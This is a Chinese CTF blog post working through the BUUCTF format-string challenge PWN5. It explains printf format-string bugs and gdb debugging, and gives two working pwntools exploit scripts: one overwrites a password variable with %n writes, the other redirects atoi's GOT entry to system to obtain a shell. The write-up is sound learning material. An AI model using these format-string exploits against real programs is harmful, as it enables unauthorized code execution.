<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>格式化字符串 | xrivendell7&#39;s ctf blog（佩奇小屋）</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="声明：本文用途为供自己学习参考文章一：CSDN-云啾啾啾（作者）-buuctf——[第五空间2019 决赛]PWN5 1参考文章二：CSDN-Mokapeng（作者）-[第五空间2019 决赛]PWN5 ——两种解法参考文章三：CSDN-lifanxin(作者)-CTF pwn题之格式化字符串漏洞详解参考文章四：知乎-看雪（作者）-PWN入门-格式化字符串漏洞参考文章五：简书-杰森任（作者）-PW">
<meta property="og:type" content="article">
<meta property="og:title" content="格式化字符串">
<meta property="og:url" content="http://example.com/2024/12/28/printf/index.html">
<meta property="og:site_name" content="xrivendell7&#39;s ctf blog（佩奇小屋）">
<meta property="og:description" content="声明：本文用途为供自己学习参考文章一：CSDN-云啾啾啾（作者）-buuctf——[第五空间2019 决赛]PWN5 1参考文章二：CSDN-Mokapeng（作者）-[第五空间2019 决赛]PWN5 ——两种解法参考文章三：CSDN-lifanxin(作者)-CTF pwn题之格式化字符串漏洞详解参考文章四：知乎-看雪（作者）-PWN入门-格式化字符串漏洞参考文章五：简书-杰森任（作者）-PW">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/5d998f6d106288471f1425ec0c940f95.png">
<meta property="og:image" content="http://example.com/6dcabdaa34cef690f69c18baa797d6f9.png">
<meta property="og:image" content="http://example.com/3c33d8595975c6f085d9c0d9e68acb7b.png">
<meta property="og:image" content="http://example.com/68283f255046e168c921e5f37889b480.png">
<meta property="og:image" content="http://example.com/2570f40a684b9e8dd24838af686cc077.png">
<meta property="og:image" content="http://example.com/d95e7e5b7dccbb246e66fc2da7f6d010.png">
<meta property="og:image" content="http://example.com/3d48e44209ffe6e8adca6fc4b5492f69.png">
<meta property="og:image" content="http://example.com/f2802996fd356dc2433c2f260d53614e.png">
<meta property="og:image" content="http://example.com/99855b914900f070472fb8629c9d2155.png">
<meta property="og:image" content="http://example.com/3d48e44209ffe6e8adca6fc4b5492f69.png">
<meta property="og:image" content="http://example.com/704c23209b52b3c023944e6d857870a2.png">
<meta property="og:image" content="http://example.com/d017fe60200ee01481ccb243086bd654.png">
<meta property="og:image" content="http://example.com/59b86d353e5cc2feffe9e6e720714283.png">
<meta property="og:image" content="http://example.com/4865bdd57ca3b46688d75d65597256d7.png">
<meta property="og:image" content="http://example.com/583378d9fc901567368737081e1cb2c5.png">
<meta property="article:published_time" content="2024-12-28T07:16:27.000Z">
<meta property="article:modified_time" content="2025-11-17T12:31:07.564Z">
<meta property="article:author" content="xrivendell7">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/5d998f6d106288471f1425ec0c940f95.png">
  
    <link rel="alternate" href="/atom.xml" title="xrivendell7's ctf blog（佩奇小屋）" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 8.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">xrivendell7&#39;s ctf blog（佩奇小屋）</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-printf" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/12/28/printf/" class="article-date">
  <time class="dt-published" datetime="2024-12-28T07:16:27.000Z" itemprop="datePublished">2024-12-28</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      格式化字符串
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><strong>声明：本文用途为供自己学习</strong><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41560595/article/details/114916869">参考文章一：CSDN-云啾啾啾（作者）-buuctf——[第五空间2019 决赛]PWN5 1</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41696518/article/details/125771666">参考文章二：CSDN-Mokapeng（作者）-[第五空间2019 决赛]PWN5 ——两种解法</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/A951860555/article/details/115061803">参考文章三：CSDN-lifanxin(作者)-CTF pwn题之格式化字符串漏洞详解</a><br><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/525576998">参考文章四：知乎-看雪（作者）-PWN入门-格式化字符串漏洞</a><br><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/dfb9300aa76b">参考文章五：简书-杰森任（作者）-PWN格式化字符串漏洞1（基础知识）</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/u014377094/article/details/124902890?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165941639716782425169227%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165941639716782425169227&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~pc_rank_34-6-124902890-null-null.142%5Ev38%5Epc_rank_34&utm_term=pwn%20%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E&spm=1018.2226.3001.4187">参考文章七：CSDN-Marx_ICB（作者）-【PWN】格式化字符串漏洞原理</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43092232/article/details/105648769">参考文章八：CSDN-n19hT（作者）-gdb调试 | pwndbg+pwndbg联合使用</a></p>
<p>@<a href="%E7%9B%AE%E5%BD%95">TOC</a></p>
<h2 id="一、思路"><a href="#一、思路" class="headerlink" title="一、思路"></a>一、思路</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41696518/article/details/125771666">参考文章：CSDN-Mokapeng（作者）-[第五空间2019 决赛]PWN5 ——两种解法</a>（参考部分：题目分析）</p>
<h3 id="（一）格式化字符串漏洞"><a href="#（一）格式化字符串漏洞" class="headerlink" title="（一）格式化字符串漏洞"></a>（一）格式化字符串漏洞</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/A951860555/article/details/115061803">参考文章：CSDN-lifanxin-CTF(作者)-pwn题之格式化字符串漏洞详解</a>（参考部分：概念）<br>  格式化字符串漏洞的成因在于像<code>printf/sprintf/snprintf</code>等格式化打印函数都是接受可变参数的，而一旦程序编写不规范，比如正确的写法是：<code>printf(&quot;%s&quot;, pad)</code>，偷懒写成了：<code>printf(pad)</code>，此时就存在格式化字符串漏洞</p>
<h3 id="（二）方法一：篡改随机数（密码）"><a href="#（二）方法一：篡改随机数（密码）" class="headerlink" title="（二）方法一：篡改随机数（密码）"></a>（二）方法一：篡改随机数（密码）</h3><p><img src="/5d998f6d106288471f1425ec0c940f95.png"><br>        如图可知main函数的功能是从<code>/dev/urandom</code>文件读取一个随机数，比对输入的<code>passwd</code>是否与该随机数一致，一致则<code>getshell</code>，而<code>printf</code>函数没有设定格式化参数，与输入的<code>passwd</code>比较的数字的地址也可以看到是<code>0x804C044</code>，因此可以利用格式化字符串漏洞，在第一次输入<code>name</code>的时候修改<code>0x804C044</code>的内容，第二次输入<code>passwd</code>时输入改内容（字符串格式，用<code>str</code>函数，其参数为16进制数字)</p>
<h3 id="（三）方法二：篡改atoi地址为system地址并传入参数-bin-sh"><a href="#（三）方法二：篡改atoi地址为system地址并传入参数-bin-sh" class="headerlink" title="（三）方法二：篡改atoi地址为system地址并传入参数&quot;/bin/sh&quot;"></a>（三）方法二：篡改atoi地址为system地址并传入参数<code>&quot;/bin/sh&quot;</code></h3><p>第一次输入通过格式化字符串漏洞篡改<code>atoi</code>函数<code>got</code>地址为<code>system</code>函数的真实地址，第二次输入<code>passwd</code>为字符串<code>&quot;/bin/sh&quot;</code></p>
<h2 id="二、攻击过程"><a href="#二、攻击过程" class="headerlink" title="二、攻击过程"></a>二、攻击过程</h2><h3 id="（一）方法一"><a href="#（一）方法一" class="headerlink" title="（一）方法一"></a>（一）方法一</h3><p><img src="/6dcabdaa34cef690f69c18baa797d6f9.png" alt="chesec"></p>
<p><img src="/3c33d8595975c6f085d9c0d9e68acb7b.png" alt="enter description here"></p>
<p><img src="/68283f255046e168c921e5f37889b480.png" alt="enter description here"></p>
<p><img src="/2570f40a684b9e8dd24838af686cc077.png" alt="enter description here"></p>
<p>根据上述内容，有<code>Canary</code>保护、有未给出格式化参数的错误使用的<code>printf</code>和地址已知的<code>if</code>语句中的变量，而且第一次<code>read</code>的数据长度为0x63个byte，因此用第一次输入构造<code>payload</code>,使得可以向<code>0x804C044</code>这个地址中任意写入。<br>以下是个人对于格式化字符串漏洞的相关深入探究：</p>
<h4 id="1-审计代码（反汇编代码）和调试程序"><a href="#1-审计代码（反汇编代码）和调试程序" class="headerlink" title="1.审计代码（反汇编代码）和调试程序"></a>1.审计代码（反汇编代码）和调试程序</h4><h5 id="（1）第一步"><a href="#（1）第一步" class="headerlink" title="（1）第一步"></a>（1）第一步</h5><p>工具：<code>pwngdb</code>，IDApro32；<br>调试参数：<code>b *0x80492BB</code>（相关地址均通过IDA得到）、<code>r</code>、<code>AAAA-%p-%p-%p</code>、<code>stack 20</code> 、（此时显示为第一张图片）<code>ni</code>、<code>stack 20</code>（第二张图片）；*<br><img src="/d95e7e5b7dccbb246e66fc2da7f6d010.png" alt="enter description here"><br>（以下内容过于基础）此时，<code>eip</code>指向<code>0x80492bb</code>，说明此时下一条执行的指令为<code>push eax</code>，所以当前执行的指令是<code>lea eax,[ebp - 0x70]</code>。<br><img src="/3d48e44209ffe6e8adca6fc4b5492f69.png" alt="enter description here"><br>接着执行上述<code>0x80492BB</code>处的<code>push eax</code>（<code>eax</code>存放的为下一条l指令： <code>call printf@plt</code>的参数，即刚刚的输入的<code>AAAA-%p-%p-%p</code>起始位置所在的地址被压入栈中)</p>
<h5 id="（2）第二步-深入探究"><a href="#（2）第二步-深入探究" class="headerlink" title="（2）第二步 深入探究"></a>（2）第二步 深入探究</h5><p>刚刚提到经过<code>push eax</code>后，输入的字符串的输入的<code>AAAA-%p-%p-%p</code>起始位置所在的地址被压倒了栈中，而<code>AAAA-%p-%p-%p</code>内容本身放在哪里？<br>在pwngdb中继续进行调试，调试参数：<code>d</code>、<code>b *0x804929B</code>、<code>r</code>、<code>AAAA-%p-%p-%p</code>。*<br><img src="/f2802996fd356dc2433c2f260d53614e.png" alt="enter description here"><br>通过IDA的伪代码可以看到，键盘输入的内容被放入<code>buf</code>中，而<code>buf</code>的起始位置通过<code>ebp</code>信息（<code>0xffffd0a8</code>下图第一处划线处）和其与<code>ebp</code>的偏移量（<code>0x70</code>）可以算出来（上图第一处画线位置），就是<code>0x804929B</code>（也可以直接通过下图中第三处划线位置<code>buf</code>：<code>0xffffd038</code>看出来）<br><img src="/99855b914900f070472fb8629c9d2155.png" alt="--"></p>
<h5 id="（3）第三步"><a href="#（3）第三步" class="headerlink" title="（3）第三步"></a>（3）第三步</h5><p>再次回到第一步的第二张图，<br><img src="/3d48e44209ffe6e8adca6fc4b5492f69.png" alt="enter description here"><br>此时输入调试命令：<code>print /x *0xffffd038</code>（以16进制格式打印栈空间上<code>0xffffd038</code>地址处的内容）*，结果如下<br><img src="/704c23209b52b3c023944e6d857870a2.png" alt="enter description here"><br>现在退出<code>pwngdb</code>，运行该程序，输入参数<code>AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p</code>，结果如下图：<br><img src="/d017fe60200ee01481ccb243086bd654.png" alt="enter description here"></p>
<h3 id="2-理论分析"><a href="#2-理论分析" class="headerlink" title="2.理论分析"></a>2.理论分析</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_52111404/article/details/127699376?csdn_share_tail=%7B%22type%22:%22blog%22,%22rType%22:%22article%22,%22rId%22:%22127699376%22,%22source%22:%22weixin_52111404%22%7D">如果对格式化字符串漏洞理解起来困难，建议看下这篇博客</a></p>
<p>第一个<code>%p</code>打印的是从<code>printf</code>参数的起始位置（本题中为<code>0xffffd010</code>，该位置偏移量为0）的下一个位置开始（偏移量为1）的内容，所以第一个%p的输出内容为<code>0xffffd014</code>的内容，依此类推。而<code>buf</code>的起始地址为<code>0xffffd038</code>，<code>printf</code>参数的地址为<code>0xffffd010</code>,所以其二者间的偏移量为10（0x28byte，每个偏移量占4byte，16进制）。在上图输出结果可以看到以<code>AAAA</code>为偏移量0开始算起，第十个偏移量的位置正是<code>0x41414141</code>（AAAA的16进制格式）。其他格式化字符串原理类似<code>%p</code>，例如<code>%10$n</code>，就是把当前格式化参数（<code>%10$n</code>）之前字符数（char类型）的数值大小，赋值给从<code>printf</code>的参数所在栈的位置的起始位置（偏移量为0）开始算起，第10个偏移量的栈空间的位置中的内容作为地址，把该地址对应的内容（只修改一个字（2个byte），改变修改的字节量可以改用<code>%10$hn</code>等（大概吧）），修改为前面说的“字符串数的数值大小”。<br>上段内容最后一句话<a target="_blank" rel="noopener" href="https://blog.csdn.net/u014377094/article/details/124902890?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165941639716782425169227%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165941639716782425169227&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~pc_rank_34-6-124902890-null-null.142%5Ev38%5Epc_rank_34&utm_term=pwn%20%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E&spm=1018.2226.3001.4187">参考文章：CSDN-Marx_ICB（作者）-【PWN】格式化字符串漏洞原理</a>如下内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">%hhn 写一字节</span><br><span class="line">%hn  写两字节</span><br><span class="line">%n   写四字节</span><br><span class="line">%ln  32位写四字节，64位写八字节</span><br><span class="line">%lln 写八字节</span><br></pre></td></tr></table></figure>

<p>（ps：关于<code>&quot;-&quot;</code>的输出问题（我自己在做题时的困惑），为什么<code>&quot;-&quot;</code>不影响输出结果如<code>&quot;0x41414141&quot;</code>的相对位置，因为，<code>%p</code>打印的是从<code>printf</code>参数的起始位置（本题中为<code>0xffffd010</code>，该位置偏移量为0）的下一个位置开始（偏移量为1），第一个<code>%p</code>的输出内容为<code>0xffffd014</code>的内容，此时还没有开始输出到存储字符串本身内容的位置，而<code>printf</code>在输出打印内容时是按顺序打印结果，例如先输出<code>AAAA</code>，在输出<code>&quot;-&quot;</code>,遇到<code>%p</code>了，输出其对应偏移量（相对于<code>printf</code>参数）位置的内容，而<code>&quot;-&quot;</code>对应的16进制数就是<code>2d</code>，所以会看到从第十一个参数开始出现<code>2d</code>）</p>
<h3 id="（二）方法二"><a href="#（二）方法二" class="headerlink" title="（二）方法二"></a>（二）方法二</h3><p>修改exp.py的内容：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level = &quot;DEBUG&quot;</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">atoi_got = elf.got[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line">system_sym = elf.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;atoi_got:&quot;</span>,<span class="built_in">hex</span>(atoi_got))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;system_sym:&quot;</span>,<span class="built_in">hex</span>(system_sym))</span><br></pre></td></tr></table></figure>

<p>结果如下图：<br><img src="/59b86d353e5cc2feffe9e6e720714283.png" alt="enter description here"><br>发现如果用方法一精心地构造<code>payload</code>，会非常困难比如把<code>atoi_got</code>中的最后一字节0x34改成目的数值（0x80)相当困难，因为buf可写入长度仅为0x70个字节，当然也可以进一步想办法解决该问题，但是本文在此处决定使用<code>pwntools</code>自带的<code>fmtstr_payload</code>函数，以期同时掌握更多工具使用方法。构造的<code>payload</code>如下</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=fmtstr_payload(<span class="number">10</span>,&#123;atoi_got:system_sym&#125;)</span><br></pre></td></tr></table></figure>

<p>第一个参数为第二个参数第一部分（即<code>atoi_got</code>）到<code>printf</code>的参数的偏移量，第二个参数的第一部分为要篡改的地址，第二个部分为要篡改之后的值。<br>(这里有个很奇怪的地方，就是当将<code>elf.sym[&#39;system&#39;]</code>改为<code>elf.plt[&#39;system&#39;]</code>时，仍然可以攻击成功，改成<code>elf.got[&#39;system&#39;]</code>后，攻击失败，这里我不太理解，应该是对plt、got的理解不够，之后尽快补上)</p>
<h3 id="三-其他：pwngdb中fmtarg和pwntools中FmtStr类"><a href="#三-其他：pwngdb中fmtarg和pwntools中FmtStr类" class="headerlink" title="(三)其他：pwngdb中fmtarg和pwntools中FmtStr类"></a>(三)其他：<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/525576998">pwngdb中fmtarg</a>和<a target="_blank" rel="noopener" href="https://blog.csdn.net/A951860555/article/details/115061803">pwntools中FmtStr类</a></h3><h4 id="1-pwngdb中fmtarg"><a href="#1-pwngdb中fmtarg" class="headerlink" title="1.pwngdb中fmtarg"></a>1.<code>pwngdb</code>中<code>fmtarg</code></h4><p><img src="/4865bdd57ca3b46688d75d65597256d7.png" alt="enter description here"><br>参见参考文章四。<br><code>fmtarg</code>使用及<code>pwngdb</code>、<code>pwndbg</code>的配置参见下面链接的文章。（如果输入<code>fmtarg</code>报错说没有该命令，则需要按下面文章进行配置）<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43092232/article/details/105648769">参考文章八：CSDN-n19hT（作者）-gdb调试 | pwndbg+pwndbg联合使用</a><br>2.<code>pwntools</code>中<code>FmtStr</code>类<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/A951860555/article/details/115061803">参考文章三：CSDN-lifanxin(作者)-CTF pwn题之格式化字符串漏洞详解</a></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">exec_fmt</span>(<span class="params">pad</span>):</span><br><span class="line">    p = process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">    <span class="comment"># send 还是 sendline以程序为准</span></span><br><span class="line">    p.send(pad)</span><br><span class="line">    <span class="keyword">return</span> p.recv()</span><br><span class="line"></span><br><span class="line">fmt = FmtStr(exec_fmt)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;offset ===&gt; &quot;</span>, fmt.offset)</span><br></pre></td></tr></table></figure>

<p>输出结果如下。<br><img src="/583378d9fc901567368737081e1cb2c5.png" alt="enter description here"><br>这里有我不理解的两个点，一个是<code>fmt = FmtStr(exec_fmt)</code>这里，没有给<code>exec_fmt</code>传入任何参数（应该是py基础不好)，另一个是还是没有理解<code>FmtStr</code>类的细节，这个需要继续学习。</p>
<h2 id="三、攻击脚本"><a href="#三、攻击脚本" class="headerlink" title="三、攻击脚本"></a>三、攻击脚本</h2><h3 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41696518/article/details/125771666">payload1参考博文：CSDN-Mokapeng（作者）-[第五空间2019 决赛]PWN5 ——两种解法</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41560595/article/details/114916869">payload2参考博文：云啾啾啾（作者）-buuctf——[第五空间2019 决赛]PWN5 1</a></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level = &quot;DEBUG&quot;</span></span><br><span class="line">ifRemote = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> ifRemote:</span><br><span class="line">    io = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">29457</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = process(<span class="string">&quot;./pwn1&quot;</span>)</span><br><span class="line"></span><br><span class="line">passwd = <span class="number">0x804C044</span></span><br><span class="line">payload1 = p32(passwd) + p32(passwd+<span class="number">1</span>) + p32(passwd+<span class="number">2</span>) + p32(passwd+<span class="number">3</span>) + <span class="string">b&quot;%10$n%11$n%12$n%13$n&quot;</span></span><br><span class="line"><span class="comment">#payload2=b&quot;AAAA%16$n%17$n%18$n%19$n&quot;+p32(bss)+p32(bss+1)+p32(bss+2)+p32(bss+3)#（在此处这个形式的payload就是）就是想说明%16$n这样的格式化参数也要算做一个偏移量，64位由于0截断的原因，需要采取第二种payload的格式</span></span><br><span class="line">io.sendline(payload1)</span><br><span class="line">io.sendline(<span class="built_in">str</span>(<span class="number">0x10101010</span>))</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>额外的解释：</p>
<p><code>%10$n</code>向<code>passwd</code>(<code>0x804C044</code>地址)写入了<code>4*（len(p32(passwd))）</code>长度（<code>printf</code>(<code>payload1</code>)已输出字符串的长度）对应的数字：<code>16</code>（即<code>0x10</code>）（<code>p32</code>长度为4字节），同理<code>%11$n</code>向<code>passwd+1</code>(<code>0x804C045</code>地址)处写入<code>0x10</code>（<code>%10$n</code>这样的占位符不会影响<code>printf</code>的输出内容的长度）(更高位被覆盖为0了，不用理)，所以执行完<code>sendline（payload1）</code>以后，从<code>0x804C044</code>开始的4个字节内容为<code>0x10101010</code>(即<code>passwd</code>变量的内容)，此时继续执行<code>sendline(str(&#39;0x10101010&#39;))</code>，源程序里通过<code>atoi</code>将输入转为<code>0x10101010</code>（看反汇编代码的main函数）,此时转为数字后的输入就与<code>0x804C044</code>的<code>passwd</code>的内容<code>0x10101010</code>一致了，执行<code>system(&#39;/bin/sh&#39;)</code>就getshell了</p>
<h3 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h3><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level = &quot;DEBUG&quot;</span></span><br><span class="line">ifRemote = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> ifRemote:</span><br><span class="line">    io = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">25450</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    io = process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">atoi_got = elf.got[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line">system_sym = elf.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;atoi_got:&quot;</span>,<span class="built_in">hex</span>(atoi_got))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;system_sym:&quot;</span>,<span class="built_in">hex</span>(system_sym))</span><br><span class="line">payload=fmtstr_payload(<span class="number">10</span>,&#123;atoi_got:system_sym&#125;)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.sendline(<span class="string">b&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>


<h2 id="四、遇到的问题"><a href="#四、遇到的问题" class="headerlink" title="四、遇到的问题"></a>四、遇到的问题</h2><h3 id="（一）懒得尝试，希望于“吃别人做好的饭”"><a href="#（一）懒得尝试，希望于“吃别人做好的饭”" class="headerlink" title="（一）懒得尝试，希望于“吃别人做好的饭”"></a>（一）懒得尝试，希望于“吃别人做好的饭”</h3><p>一开始对payload的构造不能理解，网上的博文大多讲的不清楚，或者说不对我的“胃口”，感觉自己关注的地方，网上的博文并没能为我解答，只有自己调试了。<br>比如网上有些地方讲的%p的偏移量是对于esp来讲的，哪一步的esp？有些博文并没有说。<br>拿<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41560595/article/details/114916869">博文：云啾啾啾（作者）-buuctf——[第五空间2019 决赛]PWN5 1</a>举个例子，博文中说到：<code>“在用户输入用户名处，先输入一个AAAA，试探会写在栈的哪个位置。”</code>和<code>&quot;AAAA%16$n%17$n%18$n%19$n&quot;这一段一共是24个字节，当写入栈里时，会占满第10，11，12，13，14，15个位置；</code>，为什么用“试探”这个词，到底为什么在这样一个位置？写入栈里的第几个位置，可是栈不是在增长或减少吗？这个位置是固定的吗？相对于谁呢？在什么时候的相对位置呢？也许是博主已经对这种基本知识的掌握很扎实，并未深入讲解，然而我不能理解，于是本篇文章重点对我不理解的地方做了调试与深入探究。</p>
<h3 id="（二）还是没有理解FmtStr类的细节。"><a href="#（二）还是没有理解FmtStr类的细节。" class="headerlink" title="（二）还是没有理解FmtStr类的细节。"></a>（二）还是没有理解<code>FmtStr</code>类的细节。</h3><h3 id="（三）对plt，got表的相关内容理解不深，浮于表面。"><a href="#（三）对plt，got表的相关内容理解不深，浮于表面。" class="headerlink" title="（三）对plt，got表的相关内容理解不深，浮于表面。"></a>（三）对<code>plt</code>，<code>got</code>表的相关内容理解不深，浮于表面。</h3><h2 id="五、总结反思"><a href="#五、总结反思" class="headerlink" title="五、总结反思"></a>五、总结反思</h2><p>这次做题沉下心了仔细审题代码并且不懂的地方一步一步调试，采取一种绝不向不会的地方妥协的策略，发现很多问题都不是很难解决。而且还是要对不懂得知识做深入的研究，本文待进一步修改。</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/12/28/printf/" data-id="cuidRqgp5TZrTJhA-y5AnmOp8" data-title="格式化字符串" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2025/08/10/justCTF2025/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          justCTF2025 web
        
      </div>
    </a>
  
  
    <a href="/2023/11/17/hello/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">hello</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/11/">November 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/10/">October 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/09/">September 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/08/">August 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/12/">December 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/11/">November 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/11/17/qwb2025-pwn/">qwb2025-pwn</a>
          </li>
        
          <li>
            <a href="/2025/10/10/junior/">n1ctf junior 2/2 web</a>
          </li>
        
          <li>
            <a href="/2025/09/16/n1ctf-pwn/">n1ctf2025_pwn</a>
          </li>
        
          <li>
